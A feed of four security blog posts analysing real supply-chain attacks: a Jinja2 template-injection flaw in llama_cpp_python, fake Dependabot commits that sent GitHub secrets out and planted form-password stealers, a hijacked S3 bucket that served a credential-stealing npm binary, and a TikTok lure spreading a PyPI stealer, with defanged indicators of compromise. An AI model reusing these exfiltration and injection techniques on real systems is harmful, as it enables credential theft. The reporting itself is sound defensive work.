Guy Nachshon, Author at Checkmarx https://checkmarx.com/author/guynachshon/ The world runs on code. We secure it. Sun, 27 Oct 2024 15:30:11 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://checkmarx.com/wp-content/uploads/2024/06/cropped-cx_favicon-32x32.webp Guy Nachshon, Author at Checkmarx https://checkmarx.com/author/guynachshon/ 32 32 Llama Drama: Critical Vulnerability CVE-2024-34359 Threatening Your Software Supply Chain https://checkmarx.com/blog/llama-drama-critical-vulnerability-cve-2024-34359-threatening-your-software-supply-chain/ Thu, 16 May 2024 15:21:11 +0000 https://checkmarx.com/?p=94091 Key Points
  • The critical vulnerability CVE-2024-34359 has been discovered by retr0reg in the “llama_cpp_python” Python package.
  • This vulnerability allows attackers to execute arbitrary code from the misuse of the Jinja2 template engine.
  • Over 6k AI models om HuggingFace using llama_cpp_python and Jinja2 are vulnerable.
  • A fix has been issued in v0.2.72
  • This vulnerability underscores the importance of security in AI systems and software supply chain.

Imagine downloading a seemingly harmless AI model from a trusted platform like Hugging Face, only to discover that it has opened a backdoor for attackers to control your system. This is the potential risk posed by CVE-2024-34359. This critical vulnerability affects the popular llama_cpp_python package, which is used for integrating AI models with Python. If exploited, it could allow attackers to execute arbitrary code on your system, compromising data and operations. Over 6,000 models on Hugging Face were potentially vulnerable, highlighting the broad and severe impact this could have on businesses, developers, and users alike. This vulnerability underscores the fact that AI platforms and developers have yet to fully catch up to the challenges of supply chain security.

Understanding Jinja2 and llama_cpp_python

Jinja2: This library is a popular Python tool for template rendering, primarily used for generating HTML. Its ability to execute dynamic content makes it powerful but can pose a significant security risk if not correctly configured to restrict unsafe operations.

`llama_cpp_python`: This package integrates Python’s ease of use with C++’s performance, making it ideal for complex AI models handling large data volumes. However, its use of Jinja2 for processing model metadata without enabling necessary security safeguards exposes it to template injection attacks.

[image: jinja and llama]

What is CVE-2024-34359?

CVE-2024-34359 is a critical vulnerability stemming from the misuse of the Jinja2 template engine within the `llama_cpp_python` package. This package, designed to enhance computational efficiency by integrating Python with C++, is used in AI applications. The core issue arises from processing template data without proper security measures such as sandboxing, which Jinja2 supports but was not implemented in this instance. This oversight allows attackers to inject malicious templates that execute arbitrary code on the host system.

The Implications of an SSTI Vulnerability

The exploitation of this vulnerability can lead to unauthorized actions by attackers, including data theft, system compromise, and disruption of operations. Given the critical role of AI systems in processing sensitive and extensive datasets, the impact of such vulnerabilities can be widespread, affecting everything from individual privacy to organizational operational integrity.

The Risk Landscape in AI and Supply Chain Security

This vulnerability underscores a critical concern: the security of AI systems is deeply intertwined with the security of their supply chains. Dependencies on third-party libraries and frameworks can introduce vulnerabilities that compromise entire systems. The key risks include:

  • Extended Attack Surface: Integrations across systems mean that a vulnerability in one component can affect connected systems.
  • Data Sensitivity: AI systems often handle particularly sensitive data, making breaches severely impactful.
  • Third-party Risk: Dependency on external libraries or frameworks can introduce unexpected vulnerabilities if these components are not securely managed.

A Growing Concern

With over 6,000 models on the HuggingFace platform using `gguf` format with templates—thus potentially susceptible to similar vulnerabilities—the breadth of the risk is substantial. This highlights the necessity for increased vigilance and enhanced security measures across all platforms hosting or distributing AI models.

Mitigation

The vulnerability identified has been addressed in version 0.2.72 of the llama-cpp-python package, which includes a fix enhancing sandboxing and input validation measures. Organizations are advised to update to this latest version promptly to secure their systems.

Conclusion

The discovery of CVE-2024-34359 serves as a stark reminder of the vulnerabilities that can arise at the confluence of AI and supply chain security. It highlights the need for vigilant security practices throughout the lifecycle of AI systems and their components. As AI technology becomes more embedded in critical applications, ensuring these systems are built and maintained with a security-first approach is vital to safeguard against potential threats that could undermine the technology’s benefits.

]]>
Surprise: When Dependabot Contributes Malicious Code   https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/ Wed, 27 Sep 2023 12:00:00 +0000 https://checkmarx.com/?p=87120 What Happened? 
  • In July 2023, our scanners detected nontypical commits to hundreds of GitHub repositories appeared to be contributed by Dependabot and carrying malicious code
  • Those commit messages were fabricated by threat actors to appear as a Dependabot automated contribution in the commit history, an attempt to disguise the malicious activity  
  • After reaching out and talking to some of the victims who got compromised, we can confirm that the victims’ GitHub personal access token was stolen and used by the attackers to contribute those malicious code contributions. 
  • The malicious code exfiltrates the GitHub project’s defined secrets to a malicious C2 server and modify any existing javascript files in the attacked project with a web-form password-stealer malware code effecting any end-user submitting its password in a web form. 
  • This attack also impacted private GitHub organizations repositories as some of the victim’s GitHub tokens also had access to. 
  • It is unclear how the victims’ personal access tokens were stolen – it may be due to a maliciousopen-source package installed on their PC. 
  • We will elaborate in this blog on the malicious payload and how using GitHub personal access tokens is currently undetectable to most GitHub users.  

About Dependabot 

Dependabot is GitHub’s free automated dependency management tool for software projects. It continuously monitors a project’s dependencies (like libraries and packages) for security vulnerabilities and outdated versions. When it detects issues, it automatically generates pull requests with updates, helping developers keep their software secure and up to date.  

A screenshot of dependabot’s automatic pull-request from the Flask project 

The Fake Dependabot Commits 

Between July 8-11 a threat actor started compromising hundreds of GitHub repositories, both public and private. Most victims are Indonesian user accounts. The attackers used a technique to fake commit messages (read more about how it’s done here) to trick developers thinking this was contributed by the real dependabot and to ignore this activity. 

The attackers created a commit message “fix” appear to be contributed by user account “dependabot[bot]” 

A screenshot of the fake commit, taken from highpolar-softwares/I-help-privacy-policy repository 

Malicious Code 

In the various repositories we analyzed (full list remains internal but it was hundreds of repositories) we saw two groups of repeated code changes, most likely done with an automated script. 

A New GitHub Action to Steal Secrets 

New GitHub Action file named “hook.yml” was added as a new workflow file, triggers a code push event. It sends GitHub secrets and variables to URL hxxps://send[.]wagateway.pro/webhook. This action is triggered on every push event 

A screenshot of the malicious commit contributed to highpolar-softwares/I-help-privacy-policy 

Patching *.js Files to Steal Passwords 

In addition to the added GitHub Action, the attackers modified every existing project file having the “*.js“ extension and append an obfuscated line at the end of the file. 

This new line is designed to create a new script tag as the code is executed on a browser environment and load an additional script from this URL: hxxps://send[.]wagateway.pro/client.js?cache=ignore. 

A screenshot of the malicious commit contributed to juniorriau/kejaribiak 

The code loaded from hxxps://send[.]wagateway.pro/client.js?cache=ignore is attempting to intercept any web-based password form and send the user-credentials to the same exfiltration endpoint as before; URL hxxps://send[.]wagateway.pro/webhook 

A screenshot of the malicious code; designed to steal user-form credentials. 

How Was It Done? 

At first it was unclear to us how the attacker’s got access to those accounts, especially earlier this year when GitHub raised the bar for mandatory 2FA.   

To get a better understanding of how this happened, we approached some of the victims by sending an email notifying them of the breach and asking for help understanding the full picture.  

Luckily, some victims agreed to share information with us, and surprisingly when inspecting the accounts activity we realized that the attackers accessed the accounts using compromised PATs (Personal Access Token) — most likely exfiltrated silently from the victim’s development environment. 

Step 1 – Workspace Initialization 

The victim must set up their development environment with a personal access token (or SSH/GPG key) identifying their account whenever they make git operations. This token is stored locally on the developer’s machine and can be extracted easily. 

Such access tokens do not require 2FA and can be used to access the account by any computer with internet access. 

Step 2 – Stealing the Developer’s Credentials 

We can only guess how the attackers got the developers credentials but seeing many cases of malicious packages aiming to perform that task suggest that it is one potential way that the attackers could have gotten their hands on those precious GitHub tokens. 

We believe the most likely scenario is that the victims were infected with such a malicious package, which exfiltrated the token to the attacker’s C2 server. 

Step 3 – Poisoning the Victim’s Code Projects 

In this step the attackers used the stolen victim’s personal access tokens to authenticate to GitHub and make the malicious code changes described above.  

Analysis of the scale of the attack reveals that it appears to be automated. 

Conclusion

This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub. It shows that even big platforms can have problems, so we need to always watch out and protect ourselves online.

This is the first incident we witnessed a threat actor using fake git commits to disguise activity, knowing that many developers do not check the actual changes of dependabot when they see it.

To make things safer, consider switching to GitHub’s fine-grained personal access tokens . These tokens allow you to reduce the risk of compromised tokens. So, if someone bad gets one of these keys, they can’t do a lot of damage.

Sadly, the GitHub’s personal access tokens access log activity is only visible for the enterprise accounts. If your token was compromised, you can’t know for sure since this information is not visible for non-enterprise users in the audit log section.

The attacker’s Tactics, Techniques, and Procedures (TTPs) involve the use of fake commits, stealing user credentials, and impersonating Dependabot to avoid detection show us supply chain attacks are getting more sophisticated as attackers realize it doesn’t take much to move silently.

IOCs:

  • wagateway[.]pro
  • hxxps://send[.]wagateway[.]pro/webhook
  • hxxps://send[.]wagateway[.]pro/client.js

Timeline

  • During 2023 – Attacker attacked victims and harvested personal access tokens (we don’t know how it was done and guessing malicious packages were involved) 
  • 2023-07-08 – Attacker used stolen GitHub token in an automated attack, poisoning multiple repositories.
  • 2023-07-24 – We first noticed this anomaly and began investigating.
  • 2023-07-24 – Contacted the GitHub accounts infected by this attack + reported to GitHub.
  • 2023-09-20 – Meeting with one of the victims, reviewed his access logs which helped us understand the attack flow.
]]>
image-50-1 image-51-1 image-52-1 image-53-1 image-54-1 image-55-1 image-56-1
Hijacking S3 Buckets: New Attack Technique Exploited in the Wild by Supply Chain Attackers  https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers/ Thu, 15 Jun 2023 12:00:00 +0000 https://checkmarx.com/?p=85022 Without altering a single line of code, attackers poisoned the NPM package “bignum” by hijacking the S3 bucket serving binaries necessary for its function and replacing them with malicious ones. While this specific risk was mitigated, a quick glance through the open-source ecosystem reveals that dozens of packages are vulnerable to this same attack. 

Malicious binaries steal the user id’s, passwords, local machine environment variables, and local host name, and then exfiltrates the stolen data to the hijacked bucket. 

Intro 

A few weeks ago, a Github advisory was published reporting malware in the NPM package “bignum”. 

The advisory depicted the interesting way in which the package was compromised.  

The latest version of “bignum”, 0.13.1, was published more than 3 years ago and had never been compromised. However, several prior versions were. 

Versions 0.12.2-0.13.0 relied upon binaries hosted on an S3 bucket. These binaries would get pulled from the bucket upon installation to support the functioning of the package. About 6 months ago, this bucket was deleted (the versions relying on it were mostly out of use). 

This opened the bucket to a takeover, which resulted in the incident we are going to dive into. 

What are “S3 Buckets”? 

An S3 bucket is a storage resource provided by Amazon Web Services (AWS) that allows users to store, and retrieve, vast amounts of data over the Internet. It functions as a scalable, and secure, object storage service, storing files, documents, images, videos, and any other type of digital content. S3 buckets can be accessed using unique URLs, making them widely used for various purposes such as website hosting, data backup and archiving, content distribution, and application data storage. 

The Beginning: Hijacking an Abandoned S3 Bucket  

An NPM package, named “bignum” was found to leverage “node-gyp” for downloading a binary file during installation. The binary file was initially hosted on an Amazon AWS S3 bucket, which, if inaccessible, would prompt the package to look for the binary locally.  

However, an unidentified attacker noticed the sudden abandonment of a once-active AWS bucket. Recognizing an opportunity, the attacker seized the abandoned bucket. Consequently, whenever bignum was downloaded or re-installed, the users unknowingly downloaded the malicious binary file, placed by the attacker.  

It is important to note that each AWS S3 bucket must have a globally unique name. When the bucket is deleted, the name becomes available again. If a package pointed to a bucket as its source, the pointer would continue to exist even after the bucket’s deletion. This abnormality allowed the attacker to reroute the pointer toward the taken-over bucket. 

The Attack: Malicious Binary with Dual Functions 

This counterfeit. node binary mimicked the functions of the original file. It carried out the usual and expected activities of the package. Still, undetected by the user, it also added a malicious payload that waws designed to steal user credentials and send them to the same hijacked bucket. The exfiltration was craftily performed within the user-agent of a GET request.  
 

The Reversal: Unmasking the Hidden Functions  

The malicious .node file — essentially a C/C++ compiled binary — can be invoked within JavaScript applications, bridging JavaScript and native C/C++ libraries. This allows Node.js modules to tap into more performant lower-level code and opens a new attack surface regarding potential malicious activity. 

Reverse engineering the compiled file was no small task. Scanning the file using virus total did not yield any results, since it was not detected as malware. However, when looking at the strings contained within the file, it is easy to see that there is some weird behavior, so I had to dive deep into the assembly. 

Starting with an endless list of byte additions to registries, comparisons, and data movements that initially seemed pointless, the reversing effort finally paid off – a URL was constructed by individually reversing the string parts. 

Further investigation revealed that the binary file harvested data via functions like getpwd and getuid (as seen in the strings printout), extracting environmental data. It then created a TCP socket for IPv4 communication and covertly sent the collected data as a user-agent of a ‘GET’ request.  

The Ripple Effect  

Since it was the first time such an attack was observed, we conducted a quick search across the open-source ecosystem. The results were startling. We found numerous packages and repositories using abandoned S3 buckets that are susceptible to this exploitation. 

The impact of this novel attack vector can vary significantly. However, the danger it poses can be huge if an attacker manages to exploit it as soon as this kind of change occurs. Another risk is posed to organizations or developers using frozen versions or artifactories as they will continue to access the same, now hijacked, bucket.  

The Verdict  

This new twist in the realm of subdomain takeovers serves as a wake-up call to developers and organizations. It underscores the need for stringent checks and monitoring of package sources, and associated hosting resources.  

An abandoned hosting bucket or an obsolete subdomain is not just a forgotten artifact; in the wrong hands, it can become a potent weapon for data theft and intrusion.  

Proactive Step to Prevent Future Hijacks 

To prevent this attack from occurring elsewhere, we took over all the deserted buckets inside open-source packages we found in our search. Now when someone tries to reach the files hosted in these buckets, they will receive a disclaimer file we planted inside those buckets. 

Summary 

Attackers keep finding creative ways to poison our software supply chain, and this is a reminder of how fragile our supply chain processes are.  

We need to understand that relying on software dependencies to deliver compiled parts in build time may inadvertently deliver malware if an attacker takes over its storage service. 

We would like to thank the maintainer of the package Rod Vagg and Caleb Brown at Google for their cooperation and assistance with this investigation. 

IOC 

  • Bignum v0.13.0: 
  • MD5: 1e7e2e4225a0543e7926f8f9244b1aab 
  • SHA-1: b2e1bffff25059eb38c58441e103e8589ab48ad3 
  • SHA-256: 3c6793de04bfc8407392704b3a6cef650425e42ebc95455f3c680264c70043a7 
  • Bignum v0.12.5: 
  • MD5: f671a326b56c8986de1ba2be12fae2f9 
  • SHA-1: ab97d5c64e8f74fcb49ef4cb3a57ad093bfa14a7 
  • SHA-256: 3ba3fd7e7a747598502c7afbe074aa0463a7def55d4d0dec6f061cd3165b5dd1 

]]>
image-3-1024×576-1 image-4-1024×192-1 image-9-2 image-8-1024×446-1 image-6-1024×404-1 image-7-1024×419-1 image-5-1024×423-1
Attacker Uses a Popular TikTok Challenge to Lure Users Into Installing Malicious Package https://checkmarx.com/blog/attacker-uses-a-popular-tiktok-challenge-to-lure-users-into-installing-malicious-package/ Mon, 28 Nov 2022 14:00:00 +0000 https://checkmarx.com/?p=80510

     

      • A trending TikTok challenge called “Invisible Challenge,” where the person filming it poses naked while using a special video effect called “Invisible Body.” This effect removes the character’s body from the video, making a blurred contour image of it.

      • Attackers post TikTok videos with links to a fake software called “unfilter” that claims to be able to remove TikTok filters on videos shot while the actor was undressed.

      • Instructions to get the “unfilter” software deploy WASP stealer malware hiding inside malicious Python packages.

      • TikTok videos posted by the attacker reached over a million views in just a couple of days.

      • GitHub repo hosting the attacker’s code listed GitHub’s daily trending projects.

      • Over 30,000 members have joined the Discord server created by the attackers so far and this number continues to increase as this attack is ongoing.

    TikTok’s Invisible Challenge

    From time to time, there is a new dangerous trending challenge on social media. If you remember the “Tide Pods Challenge” or the “Milk Crate Challenge” you know exactly what I’m talking about.

    This time, the latest trending challenge is called the “Invisible Challenge,” where the person filming poses naked while using a special video effect called “Invisible Body.” This effect removes the character’s body from the video, making a blurred contour image of it.

    This challenge is quite popular on TikTok and currently has over 25 million views for the #invisiblefilter tag.

    “Unfilter” Software

    The TikTok users @learncyber  and @kodibtc posted videos on TikTok (over 1,000,000 views combined) to promote a software app able to “remove filter invisible body“ with an invite link to join a Discord server “discord.gg/unfilter” to get it.

    Discord Server “Space Unfilter”

    Once you click the invite and join the Discord server “Space Unfilter,” there are NSFW videos uploaded by the attacker, claimed to be the result of his “unfilter” software. An attempt to include sample videos as proof to trick users agree to install his software.

    In addition, a bot account, “Nadeko,” automatically sends a private message with a request to star the GitHub repository 420World69/Tiktok-Unfilter-Api.

    Trending GitHub Repo

    This GitHub repository 420World69/Tiktok-Unfilter-Api represent itself as an open-source tool that can remove the invisible body effect trending on TikTok and currently has 103 starts and 17 forks, through which he gained the status of a trending GitHub project.

    Inside the project’s files is a .bat script that installs a malicious Python package listed in the requirements.txt file.

    Looking at the project’s history, the attacker used “pyshftuler”, a malicious package, but once it was reported and removed by PyPi, the attacker uploaded a new malicious package under a different name, “pyiopcs”. This latest package was also reported and removed, and he had yet to update his code.

    In addition, the project’s README file contains a link to a YouTube tutorial instructing users on how to run the installation script.

    Technical Analysis – Malicious Python Packages

    This campaign is linked to other malicious Python packages, “tiktok-filter-api”, “pyshftuler”, and “pyiopcs,” and since this is an ongoing attack, we’re keeping track of new updates.

    At first glance, the attackers used the StarJacking technique as the malicious package falsely stated the associated GitHub repository is “https://github.com/psf/requests”. However, this belongs to the Python package “requests”. Doing this makes the package appear popular to the naked eye.

    On top of that, the attackers stole and modified the legitimate package’s description, and the code inside those packages seems to be stolen from the popular Python package “requests”.

    Looking inside, we find under “./<package>/models.py” a suspicious modification to the original file as a one-liner related to WASP’s infection code.

    A Desperate Move

    After a cat-mouse game, as the attacker’s packages have been caught, reported and removed by PyPi, the attacker decided to move his malicious infection line from the Python package to the requirements.txt as you can see in the screenshot below:

    Conclusion

    How does an attacker gain so much popularity in such a short time? He earned his status as a trending GitHub project by asking every new member on his server to “star” his project.

    The high number of users tempted to join this Discord server and potentially install this malware is concerning.

    The level of manipulation used by software supply chain attackers is increasing as attackers become increasingly clever.

    It seems this attack is ongoing, and whenever the security team at Python deletes his packages, he quickly improvises and creates a new identity or simply uses a different name.

    These attacks demonstrate again that cyber attackers have started to focus their attention on the open-source package ecosystem; We believe this trend will only accelerate in 2023.
    As we see more and more different attacks, it is critical to expedite the flow of information on these attacks across all parties involved (package registries, security researchers, developers) to protect the open-source ecosystem against those threats.

    Timeline

       

        • 2022-10-28 – WASP open source created

        • 2022-11-10 – Discord server “Unfilter Space” created

        • 2022-11-11 – TikTok videos published

        • 2022-11-12 – Python package “tiktok-filter-api” published by the attacker

        • 2022-11-12 – Python package “pyshfyuler” published by the attacker

        • 2022-11-13 – “tiktok-filter-api” and “pyshfyuler” reported as malicious to pypi

        • 2022-11-18 – Python package “pyiopcs” published by the attacker

        • 2022-11-19 – Python package “pyiopcs” reported as malicious to pypi

        • 2022-11-22 – GitHub repo reported as malicious

        • 2022-11-22 – Discord Server reported as malicious

        • 2022-11-22 – TikTok videos reported as scam

        • 2022-11-22 – Attacker move malicious code from PyPi package to requirements.txt

        • 2022–11–23 — Attacker removed the malicious code from his repo

        • 2022–11–26 — Attacker added same malicious code to main.py and method.py

        • 2022–11–27 — Discord server “Unfilter Space” delete

        • 2022–11–27 — Attacker changed his GitHub repository name to 42World69/Nitro-generator

        • 2022–11–27 — Attacker deleted old files on his repo and uploaded files to fit Nitro-generator

        • 2022–11–27 — Python package “pydesings” published by the team behind WASP

        • 2022–11–27 — Attacker added malicious package “pydesings” to requirements.txt

        • 2022–11–27 — Attacker added malicious code to main.py

        • 2022–11–28 — Python package “pyshdesings” published by WASP creators

      IOC

         

          • hxxp://51.103.210[.]236/inject/UU7X9zT79b6aHuvL

          • hxxp://51.103.210[.]236/grab/UU7X9zT79b6aHuvL

          • hxxp://51.103.210.236:80/inject/qiNbZFHkBHmbLQXS

          • hxxp://51.103.210.236:80/grab/qiNbZFHkBHmbLQXS

          • hxxp://51.103.210.236:80/inject/VSpinLJKHaPMTkic

        ]]>